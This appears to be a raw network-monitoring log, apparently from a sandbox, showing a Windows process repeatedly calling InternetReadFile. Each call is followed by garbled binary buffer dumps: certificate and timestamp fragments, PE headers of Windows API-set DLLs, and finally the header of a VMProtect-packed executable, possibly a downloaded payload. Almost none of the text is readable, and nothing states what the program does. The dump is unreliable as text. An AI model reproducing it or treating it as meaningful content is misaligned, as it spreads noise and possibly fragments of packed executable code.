…ÿt"òò€0ë(hàÿÿè?âƒÄ¸ÿÿÿÿë&ǀ4¦¦¦¦Ç€0¦¦¦¦jVjjRQPèyƒÄ^_]ÃÌÌÌÌÌÌÌÌU‰åSWVhOèÿáƒÄ…Àt0‰Ç1ö‰€8ƒÇƒçðtk‹] ‹E‹U‹M…Ûtòò‡0ë%hàÿÿè²áƒÄ1öë<LJ4¦¦¦¦Ç‡0¦¦¦¦jRjjPQWè…xƒÄ…À
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: œH™i)¡ŒN¨ãæ¾IÌeV=Ä0' +‚7 10¡€https://mozilla.org0  *†H†÷ ‚(¢êh”!è eýFˆ%mݨŠ&µ‡gwº<ˆÚÌ3ÐJÁªœ¥Ùn¥¬*4€PðhPYçډetjæî}@³~?äàP|À¢¾4=ãóUÙÌøM„ßbCD¶.®Õ ‚4nÛRR5bÅHë­¿Ï3^eüÇ~j05Í’ãðú.²'ð@ìŒøÇ®K}Bʧ—ü6‡Íñ0µle´ôŸò—i’»ØÔéLÎmkÝ|eã7WGŽã¡+YDÂÕiP͕±ÿº¥>µ©HB‚å:–çy±ãRjÄßaN°0¦r6•ãɼ!¹¹ÛíUg üÅʀ‚(ÍÁÝ Æ ÷)òÓ¬-x~‰aäy裪@dYv¡“~l”í1@ا|%š ž(f_O™izgÎMvgä»ÂÎ¥|Š¥w¬<Ðþ6 ¿éΈ eBI¨ßH—“¤zѼë›3Î×ÇSsГöҐÉSN“r¼…ä}Ý(zƒO‹’¾~ÙJÍLí©sv¾Ò€’˜LƐ—s@C1ýsÊÜ»”`ß ×v] ÃdJ±4?‡Ì™óž±ˆr<ßÆê€fiÛ}dÎÆgð‘Fììôî¼·d¥Fƒ›lR*ã7¾0c›'j‡2ó—oºiç¦?\hånbŠlà,0Ê 2%¦¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" J–èW´Ý†sâö(C‡ÓjH¶ÊwU9 ^«m͵0  *†H†÷ ‚FS$Ð¥þ?]E’~lël†J±>F)Î.êÇøƒs?ß°=+þþìÿ^ @µ§Ÿù +“[Ü^ö;g¹QÜÅ_OF§vùl>ûBx1‰ODéï] ë¬Àr–›Åƒ²'6Ï&¸¤Â7Y:ª>`¼åØÆS5¾_÷ŒÁ‰8÷i’à6@ù­xÚ$ Ýè‹F%‹…ÎxNÅôOÅ=ò ã.‡Í«3—î#ÒÎ̔×kéϱ™n‹]-á»’VBƒqůJ- F)F!ïXԐ77ž§Vaèü•N–`°x!IʲÇ˽ÞrÞÊÕdÏIðÒCFÆMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELyî¯`à"! ¦îP¨àœ@ADSS—Tðx˜¸ 4DNÀ XŒ.text&¤¦ `.rdataÔ¨Àªª@@.data@ pT@À.00cfg€\@@.rsrcx^@@.reloc4 6b@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ÷ ‚2OaÐÝp[AØ5¦]†°¶4^\`ű‹¢tq²ØìxՖzÓÄU£xÒö̉rç3gnˆªjÛ{Š`ѾT¾0à¯ï$;ªËþà*Ž\•ªÎCtêš&—3$ó`Àá[ý§A¨TÔåT®N,º¢w¯Ýô,¨¸pÂÀߢ/zÈë$cbAȒ+C EVw@b¿#¾Mˆ´j‰ÎÌÔýö°×¹ZE ú —'3µóZ…—„÷ófJ¼EÅ¥7£ŽI0c¼7Ìmr’Ffâ퓍ߣCë9”I÷îÍÐ9Õc Ä"å…6~3AË¹i–Øï*Ù&ߥ&_̾¯õ²_åPjÔlU^‚‚ùë7¥°4y}ŒÙ°½ u­ÿ­¿ë§ô½Œ‹¹I%h÷%ÓÈ \ñ«Kg6>t÷8eiht)#7Q[g+ Þ?ø‹–oÞîúTÈЅoL” T­™³«8ښ½C:íú³X2/š-ãÇ5}@üUÙôÍù¦–=ˆX¶ÍS-€/}¦y,~n~ƒÎÎqçÀeQ^ÿQÕ¯×þ<§}²×˜±º'þw3‰•á&݊š•)õc^HÛa«åÐáÒOðO¥ìŸ к¾Ó48ß?”³ˆOžY#Cx¾Q‹/‹BBpÒ² K›‰¥Æ›…Êo H›¡‚00‚, *†H†÷  1‚0‚0†0r1 0 UUS10U  DigiCert Inc10U www.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ˆÿ`@!ÎðÝ0  `†He i0 *†H†÷  1  *†H†÷ 0 *†H†÷  1 210527192334Z0/ *†H†÷  1" šÐôãÖ£²1€›Y£{iÆà¼‘ª(p ÝûEeéï0  *†H†÷ ‚C‰%*QRíV`äӝAü"ú„XÃzA¦âC–]Ö|K>éÛ^ʖќx²ÀP¹V;1t/ˆçÄ.ô’ÅO°g ú±‹ߒ"æJÚI¥œÒQå·+"#¡·ûQl[øþ·|¦‘çdù~x›¾e‹ö×íÛÀ&L?I!ȤAª ûÉÅþþæ·ôƃ´ÎÀÿ W£ÆUþ©È¢€¹á± ®ÞU„Ò2ގŒDÓ¼¥ß/>Tù„òeó2UD/§S„È)CùÕKcrñ2²DßÐր¶p‹,™Æñ N.´¯è¿˜)J 4$­šFÃ'-"YO ‚ù(:hŽáMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELIìOà!    0@ðL ð =T.text< `.rsrcð @@IìO8TTIìO dŒŒIìORSDSyN'Ò;rC¿ù¦Ðl{¤api-ms-win-core-file-l1-2-0.pdbT.rdataTœ.rdata$zzzdbgðL.edata `.rsrc$01` .rsrc$02IìO@(8lŽÆ`¤ñapi-ms-win-core-file-l1-2-0.dllCreateFile2kernel32.CreateFile2GetTempPathWkernel32.GetTempPathWGetVolumeNameForVolumeMountP
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 9Z$WÈ rP«Ð‰tì g)]Ôŵ <H¯ è¬çõ4ž½h43œx*Ò±}€õ: ¯:‡ÛYïIg£6w _/ íkó°›1f›1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" X™ϧ‡j¸¶ENŠQYÝá“n›ÝÉGÐ!Uøº³#0â *†H†÷   1Ò0Ï0Ì0±ÇÁ½0{¥žd^gt6ú»ã™¼hû0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖN–‰Ûõ®0öƒRó_ÚâÔ¶r#j¶3[™+0  *†H†÷  ‚X¼´÷Yï;wnÂC™&ûv¸±Ú6H鄦š×Z]l%ˆ­<‡ ;<Ögëö¶$á2¬çÝj›¼bµÌڎ¡ª’–™vßƸŠIË `–Â|ãZƒ<sêo¾È{lbÖÆ}¤—õàS»ŸÄ$=ç²£î)7j|Xê[£×w4“LøImàD³hÑq“5úØäï¨}Ëk)@¨øá» BŠ–ZŠ¡“¶엍LÜØul“í1÷6aaÝÿ8Í^Á¿r<2å䰏g:̑ëÆs÷`£àóø¹ÊTAýÁ˜Àò~µ¶%2ːµÎ@”sßagÚé]?è´³Nu÷:3MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL%éàrà!    0“`@ð ð =T.text} `.rsrcð @@%éàr8TT%éàr dŒŒ%éàrRSDSäòVf0…°<☠Ûj\api-ms-win-core-file-l2-1-0.pdbT.rdataTœ.rdata$zzzdbgð.edata `.rsrc$01` .rsrc$02%éàr† Dp°Ï÷#PŠ¼ç;g¦Ãä<m°Ñ%Z api-ms-win-core-file-l2-1-0.dllCopyFile2kernel32.CopyFile2CopyFileExWkernel32.CopyFileExWCreateDirectoryExWkernel32.CreateDirectoryExWCreateHardLinkWkernel32.CreateHardLinkWCreateSymbolicLinkWkernel32.CreateSymbolicLinkWGetFileInformationByHandleExkernel32.GetFileInformationByHandleExMoveFile
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:  ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ïs8.b˜©ÉídhÚ"Ýje1ä{و/^áÚÔpÕÈO0â *†H†÷   1Ò0Ï0Ì0±9p%‹ÈyÝ_ ]鋜³”™÷·0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬Š!¼zқrô¬0tìüe¨i©™¸¶Tÿÿ‹•½øYÂ0  *†H†÷  ‚ˆÒj´2ÕÝ*U+\è—qze¢>¡jÞIVBwéš>&‚4Þed(ˆ&3àÖ8WEäx/iR…ÊQvï¨Ãõ¢i¦¶SâŬOÉ쮿èE2ñÖo„ Çý.͏܀íKã¬ýۙhówˆ(êqßxzD=á­Îò]É¡®xîÓ­N¤¢$G:W¬ò`¸ù€í¥m¾#è©[œ§£ÝVM…|•Êäî>Ó_‡r/( ”¿þàý:p8 ‹Œ‘ÆEa¸N# ±OÂÿ¬¾Û†áÐþÍô.ßè5Ýu™Œ¸Ñáé§!(αû<‡Ï\,³+”uZ§¡_MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELc» @à!    0<H@Ç ð=T.textÇ  `.rsrcð @@c» @@TTc» @ d””c» @RSDS¾«ô@Ó¤ª&˜¤ê$&api-ms-win-core-localization-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgÇ .edata `.rsrc$01` .rsrc$02c» @v;;(³á <fµÜû5]‰²Ùý!Iq—¾àNƒÁø/j™Çø/^Àá/\ˆ¶â 8`„¨Ïû'P‡¿ö1[‚­žÑú)X}¦Íô (Kx£Êñ9b‰®×ò9l£èV‡´ãQtµÔ÷Ix¡Ôù&Sv›¾éAh¯ØNqœ  !"#$%&'()*+,-./0123456789:api-ms-win-core-localization-l1-2-0.dllConvertDefaultLoca
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: —Éʛ$è“y1ôý¦ÅL³ÎÇ°÷ìêj%2¾Üa¦2½ÁÈpõÜ£¿sÀË*vü8vG,Iə!´†EŸeéB$-™g5/ɄF+¯.ÂEñ8J8§š~+™1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" O«Ê™0¼“—’é´kü%¥|tªtüîðö–¼ R¿)0â *†H†÷   1Ò0Ï0Ì0±›Â5Ýû²&+1eP/S”i‚o0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¥Hr'ùp¾c¥0+âä’<„~®å‘ƒ“£MŸ"0  *†H†÷  ‚:’ï¢_´¤J҆yFXÃøY•–î8[ï3/(~KóØ5²ÈXo'[ wM¨¼ ‰P+®—ÅÒ2d‹S6T8­Emƒ!VÊä‰æg²ƒm=TZ0ŒnŝÍZR‰½L)é…ç,öqÑ”:Ôtâ‰ÖÄ4—ÎnùÄm£äiÆWZ ÄÁ\¸Ñ<Õ=¥¨Ø=h­G3:JzÚºÚn´$³†Ōã®@¢ÁrÂTŽVI2 ¾þ>%¡K4ÌÛÞ¿En~ +æÏc6â…p‰ñAd–ߍå!µsM±cñ&sӄ=}ýi¦|ëå›_içp«˜)ÆûÃF1‰4dMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELZ¬Îsà!    0¥¿@Ú ð =T.textÚ `.rsrcð @@Z¬ÎsBTTZ¬Îs d˜˜Z¬ÎsRSDS׬ój‚ñ°¶ýO×¢m÷hapi-ms-win-core-processthreads-l1-1-1.pdbT.rdataT¬.rdata$zzzdbgÚ.edata `.rsrc$01` .rsrc$02Z¬Îs´(`˜ô-l­è"W‹½ïNƒ·ÞP‘ÒFq®Õ3r api-ms-win-core-processthreads-l1-1-1.dllFlushInstructionCachekernel32.FlushInstructionCacheGetCurrentProcessorNumberkernel32.GetCurrentProcessorNumberGetCurrentProcessorNumberExkernel32.GetCurrentProcessorNumberExGetCurrentThreadStackLi
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: êÿ0ï0 ބð]06 +„Y 1(0&0  +„Y   0ã`¡ 0„€0  *†H†÷ ‚F´zxg¾‚uÈÜÞX¾©€:¬j-‰KžS7è7LŠCª‡Í²ÆZmíºêÄx`ÿŠ€B'ËP ‹6Þ@lP¸ªèeÒ'՘ü?}ç\æ±}“ŒG访Èñ„$÷‰ gⱟN6× ©w Ï…1WÒlîõäZ¸`…Ü¥·]ñÁ¸]Û¬=SԈç»~_ÊyÈìøƒ?<օg ! &Ž=°‡+–!—“ÅùB±|.öÏðƒo„þåV(փ¼OH¦ÐU[äÿA *u@®è¶î\3·eåì|ÅYM 4 8(o–[ 3ÚjO#ø1 w#fK¤Ê )¿?Û1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ®«Æ?¶Ìæ¯{ÃÐ+YR£„«1?G¿µJŸôS¢Œ0â *†H†÷   1Ò0Ï0Ì0±ÕãÐþY6äÂdYIé×"ŒÇEê 0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103·ø"}"þú·0åc¼ƒD²H¹$GV¨šµž¥0  *†H†÷  ‚§pæ/¥¥‚ë`=cuˆaÅè"h»m+fBÇ6Y°œš*³PrÙ °­~´…mZ¥MªïDŽ'm/&R°Èòµ©ö6­QÀ묏Û%ÿ~~w®ç”‹ÑÚ  û(%¨"y‹„¦ž4‘ßs´Éƶý¹7«H šŸtš7Y©¬¤ LˆµPñZ®ô=« Möª^°3SÎb¨ÐÌ«ÇlýãžüÌç 쳄Ê.M5žR©ë)}?øçØoá5}›ƒ ŸAÕDYç<´ßzƒt<YrÉ-ШTÂDÅܶ73œ)†sQdB(áG—:1osøå_Úöˆˆ7«MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL«>»²à!    0RÏ@v ð =T.textv `.rsrcð @@«>»²9TT«>»² d«>»²RSDS©ßÝ*YJeíå§ðX÷Qapi-ms-win-core-synch-l1-2-0.pdbT.rdataT¬.rdata$zzzdbgv.edata `.rsrc$01` .rsrc$02«>»²Ò(l°RÁïWÛþ&b“Ãö$Wó6w°Û ;|Çø H…
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 0U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒ\0"20180419214500Z20180420214500Z0t0: +„Y 1,0*0 ރŒ\0ç0;0 ބÝÜ06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚#…&Àµøðnôþ¦ƒo"Ï''¶Â“öôO¯¯,}ÂN >G@ÔoÐg&ÙT}'"yIÖJÀÛ)ê:Ÿx5 ûŠ9͚í¨Úm“µ’_”5 š^ËõŒ1$¸HنH¦é@ µ§,<×ÚÛZ`ÂIsͶ{`€lê?ÚÚpjÎnîø¼à…„Èú»vÔÃÛèhÊgk-UB ˆÑH}vô"¹á>‘¶Ý“ÚظË%RÜúW¡#‹eeÕ0 í ëÁEü²ú©CøKÖCÂ@8 X‰ Äå_-~n¥Ü˕$ñ³Ó¾`â볃y^k8h1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ÈÁª*–æq •Þ:(@ÛbwSì•fÕ¿sªY0â *†H†÷   1Ò0Ï0Ì0±ä‚.26mt2Á!´ ë wÙ0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï· 70  *†H†÷  ‚k„ŸÑ{_,Ã7A÷$ŸÌhÊýU/Ôdn-ì‹{«&“<;ü‰5K~¡þÅøf åÑS"Aô¥‚,ªº ÿ|¿„kQ–õ£ˆXv+AM‡©Æ“w;U¯¹=U<™m åæce«R³¬‡Š.5ò\xbÎSy©¨ù_m‹É.³€:ü—l’«†ZP†»91¥›ÜìU¶ûc·Lßâ"gª…ùÍœd¿Äa€7®í 2xöNÉËuCIDðØ­°‰rÍù¼TÞ/ƒ/Ñ\‹| (ç(̞yyÎ!ëYÔÙ7'ÂDÿMI=ºî¢œHñz¡°’F­¿Á-ç†eÚ^k›MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELƒ} üà!    0a9@E ð =T.textE `.rsrcð @@ƒ} ü<TTƒ} ü dƒ} üRSDSfbf¹{£Á¬AïÅ~}api-ms-win-core-timezone-l1-1-0.pdb
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž2 Á0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŒÈ0"20180419214648Z20180420214648Z0t0: +„Y 1,0*0 ރŒÈ0³0ž0 ބÞH06 +„Y 1(0&0  +„Y   0ã`¡ 0¡ 0  *†H†÷ ‚ÑyÄ £§"?ïk¤££’o ˜x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxòš¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«‡{_gùk‡À¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXƒt¦EV‡‚؈SÑÕù–4¯X¥F¼wÎXä .÷&Yµ`_ | Á¼çØwCC)ôöIZˆ]ײ£ÌíZ÷·ŠËŽ`Øè¡ßUÚ7\„'§oKq¯ÝWóÎu ßÝ×v…ôHd /ʅ![³R±ne”=äŠäžØÀ1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ¯üt-6XßØól.Í\° nÇxP…~F¦úÕ 0â *†H†÷   1Ò0Ï0Ì0±Éì»H-5ٔ¾¶Ž÷&©1nŠ‡Ž20˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚bÁkBÜ_<qÂsO-ß<]s,¯·é—óïÚâ½z{m7ß Q'|ݟ¿¬úŽÉÌy`걂MlZ*Õë_4$ŋò•Ԉ/¯"o^‹ë´Ég»·Š«èžÓ¦á]TÈÑ ÈÝuë±&µ âÚO}';€(JH,÷ÏÑç©Fz oÐùks[q¥~_h;TÙÁ™θp,9̌ùê›:¸ÃP•õÔé¯,WÔíÏÝ5à ;0J°Û“åþ2+uûy‹/˜·OM@ ÊãXNñö ´ ò„öø ÀcTýõ!æE°¤'zØxYžÌðõÏ®ì‡ÂMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PELxèÆöà!    0À¬@ð ð=T
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: oft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@žõ«Ê ¾ß0  *†H†÷  ‚.˜UéêC½0Ú^–I„ØBn›>·yÅ,—5mXpÖ©ýšùÞÕ¯3ŸeÄð?‘ù×ôâf_~É«wÉ2ߖÄZA§ „<1J4Šþ%VÓ</]’܃ø9ҺӅÇgÕ]çqÀ-éJ¬Ä9×"ŽÑž1©¨TVˆO5i¹‡¨¨òé7Ñ«HþŒø3¯"®'à՚nŠ“Åòk×Æ+@¾Xøe°t’Õ‘ß2…·"d£?(»µc†ãüf1}\Ó°D¬\'Ì+YDmì½Gàðãõu´ì\¥0<CM¬Ñ¸ã'ûT~‘‘S¢ÿï~lõ°=k„sAMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL”Qžà!    0N@e ð =T.textu `.rsrcð @@v˜”Qž9dd”Qž d  ”QžRSDSˆÏ¦5m(åá°nfŠúapi-ms-win-crt-locale-l1-1-0.pdbd.rdatad¬.rdata$zzzdbge.edata `.rsrc$01` .rsrc$02”Qž8ˆØ5hžÑE§Óÿ$Nt”´Öÿ$Db!R‡¾í s˜¿ð:k†«Æï9X api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_funcucrtbase.___lc_codepage_func___lc_collate_cp_funcucrtbase.___lc_collate_cp_func___lc_locale_name_funcucrtbase.___lc_locale_name_func___mb_cur_max_funcucrtbase.___mb_cur_max_func___mb_cur_max_l_funcucrtbase.___mb_cur_max_l_func__initialize_lconv_for_unsigned_charucrtbase.__initialize_lconv_for_unsigned_char__pctype_funcucrtbase.__pctype_func__pwctype_funcucrtbase.__pwctype_func_configthreadlocaleucrtbase._configthreadlocale_create_localeucrtbase._create_locale_free_localeucrtbase._free_locale_get_current_localeucrtbase._get_current_locale_getmbcpucrtbase._getmbcp_l
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ime-Stamp PCA 20103§d]Å(=D§0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" Ghq%ZÉñâì=sÐZWùòÐ1”]ÉÌØ0â *†H†÷   1Ò0Ï0Ì0±ä‚.26mt2Á!´ ë wÙ0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103§d]Å(=D§0°¼lz<ðKsâæËhCï· 70  *†H†÷  ‚„I¯Ií‹c`ÞHóJc‘¯mNéæOáö_óÒƒâëEõƒÖ”÷Öô”Ô› òÎ ÈBƒQc–Cki%º-h®kë0¨|š¾@²ˆIôù½&@uÅ+ö‘ äÍ $ªUÌï7÷‹¿p“4‘ó–Ød¸+ð¸,¥óà •Lø¯{¼ ž%cÝÎ2°:k¬‘’Òi>ÃtÄÌ|Äõ¶¦ û¼c ûòYsƒO)©^øêzÇÈㇱ.‘'ÝähœK¶Pˆìª 5a–o7‘(å– vò”«}ÛUDú0,¢ZáE“\ ªI±&cô‹¼dþå«È5:ž³¢¨ð 'WMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3A Áw e’w e’w e’De“v e’Da“u e’Dš’v e’Dg“v e’Richw e’PEL2àÀÊà!  Úð K@ƒ×ððà=T.text“ØÚ `.rsrcððÜ@@v˜2àÀÊ:dd2àÀÊ d  2àÀÊRSDSTrXTŠ¯{ïÝbŽÝÛéñapi-ms-win-crt-private-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgƒ×.edatað`.rsrc$01`ð.rsrc$022àÀʦ>‹‹8d#5Ù>?-?U?’?Ê?î?@L@‹@·@ì@!ARA‚A°AßABBB€BÅBC>CvC©CÑCõCD>DwDÀDE[E˜EÇEöE'F]FŽF¿FýF8GkG“G²GÜGH7HYH„H¶HíHIEIsI IÇIêI J(JGJgJ†J¤JÂJàJþJK<KYKwK–K´KÒKòKL:L^L‚L©LÒLøL%M^MšMÓMN<N}NÀNO?O‚OÇO P;P_P‰PºPìPQPQ‚Q´QçQRHRxR¨RØR S=SpS SÐST0T`TT»TàTU-UUU~U¥UÎUùU!VHVqV›VÅVñV$W`W¤WåW!XbX¥XåX$YgY¬YîY
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: 0  *†H†÷  ‚`îÎá}ŸyÆxÎL¤jgG—ŠrÊäÁ|ç-㏑g¼ètz?ÊéF$?¡Îð~OÒô}ôv86¥Ù‰oÊÅSï, •Ñ yÅÒîm<?‘Fé¹RÞß\✤MQjÂé“MFr&ù„ÿ“wÝè=Tü _‡½Utšéd¬°äÊ\;  UX°Ã˧¼Y,MB‘í[³0.’§“ŽN€ ®©y1ìR‘|•¯ÁÎ#Û™ÌjÃÄô,ud‚, Ø÷še¨\•œ~Xîyó‘!­ÛÍ,¿µˆrþ_vv2ˆ®R<m9.ÌN$I-/©fÖüh&¡‚t0‚\0â¡¸¤µ0²1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher DSE ESN:57C8-2D15-1C8B1%0#UMicrosoft Time-Stamp Service¢% 0 +œœÅk˜Ì§Á­G ìÓDüÎmÐꠁÁ0¾¤»0¸1 0 UUS10U Washington10URedmond10U Microsoft Corporation1 0 U AOC1'0%U nCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0  *†H†÷ ރŽñ0"20180419215601Z20180420215601Z0t0: +„Y 1,0*0 ރŽñ0'0×0 ބàq06 +„Y 1(0&0  +„Y   0ã`¡ 0„€0  *†H†÷ ‚‘qS;¾gJÚ& Z©ÄÔ¸ÝíÜ>{~œM+Ó“·ÓÍö_Ð@'‘­ÐÔí]µ!„œWVzPšÝÛ:‡'rå¯Õ±¯€s }рƒä'p?#ê9Åñͼ³Ä=«¶Š=mE¶ˆÑ k:܋¼ºÒ”à e’ /  oÇëV‘°1{‚oÒ½nÂ7ÚÚæ^Z¸JÜÀ&&û®¹ïhò92Ša^ñ¨û^BA1ÜRí 5–A⠀ô64·sãݪnòDlˆþIl¼Eص Ûç*­…¬J“´kÎÙ àãQ¢ë÷2âBQKðøÿUEøû¡n=MD¥<KNå¿1‚õ0‚ñ0“0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ˆÿêWà ª0  `†He ‚20 *†H†÷  1  *†H†÷  0/ *†H†÷  1" ¹1®¹´GTóo…•þs1)_-súñ\éÖ(¾õ;ÿëY0â *†H†÷   1Ò0Ï0Ì0±œœÅk˜Ì§Á­G ìÓDüÎmÐê0˜0€¤~0|1 0 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103ª·©ˆÿêWà ª0™ßW )”[ËK¸D, ØBÂ㤤0  *†H†÷  ‚œ´íö[Y_ë)PS‰ÜgFA¤ÒÏkƒ2 .1C®•o!¦I"b ©è¿„N¯˜ òZvMÃåçÓÏ&öÏfƊE¸°ÖL‚Ž•÷ßî¹cŠ»M¨ S–2¾ÝåT*/?;ÐFþÊ»23˜qøc+BqÁ…z²Hє¢Í ~ÍGg%£Ömºåm|&ı²fOÞpiñr)¹²d'…퓍 PCŒÕ~­ûãž6NÑ«hø'ï:~xŽà­X ½s`èq‰ Úh¡n^pʁ¤‰βÔýU³{{È'Ó ¯3b BÞz̞1̘ñ¿o¶ãÈMu´ÂOMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode.
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‚;kaà 8>¹ÈeP@PkUÏB@l+ àiefÐiÌÀÅi@Yh.textç7 `.rdataÀYP@@.dataœ°@À.vmp00&Ð``.vmp1`·@)¸@``.relocÌÐi¼@@B.rsrcefàihÂ@@@kt½bM |åe[wx4XQºy zY(g#6Ik¶Re‰ Œ`ec…Šo:_œ`M¢Z1©`³E6Hµ< 3` 7ú1tII´.¢&×9—/_=Ò+°_'EWç;yìvJ‡WŽ n.¼KÍTWLmE8Pp½X!¨T§vfA×Lé TQ‹WzSæ[ü8vá,M']:×)oL;ÙnUÿ,$™a¬, ßBXuÊi¢2 Q6(Õ Ó:ag@m9ÆleeA’™ …^N"'\U¸']JþQuHú/“o$C ü õÎ"}@IwHïZO:Q3Ùõééèû=é.E)@ù5µdÜpf…áém3é0;3‹€úï3ÓøÁÊf÷Çëùêy/‡]ÁÊõÊ÷Ú3Úõêé4÷ÐHùfý M3Øøùõèé½z6÷Ñé^Õ2‹×f«áÒÁ¿üÿÿÿ‰œÁºùâÀɍ¶üÿÿÿÒÍ»á‹3ËIÑÁé>±/ÉéÛ'4‹<°fº3JfÚy@6f¶f«ùÓÉø¶f¤ùmf‰f…ófÓ፭üÿÿÿÓÙfÑ7 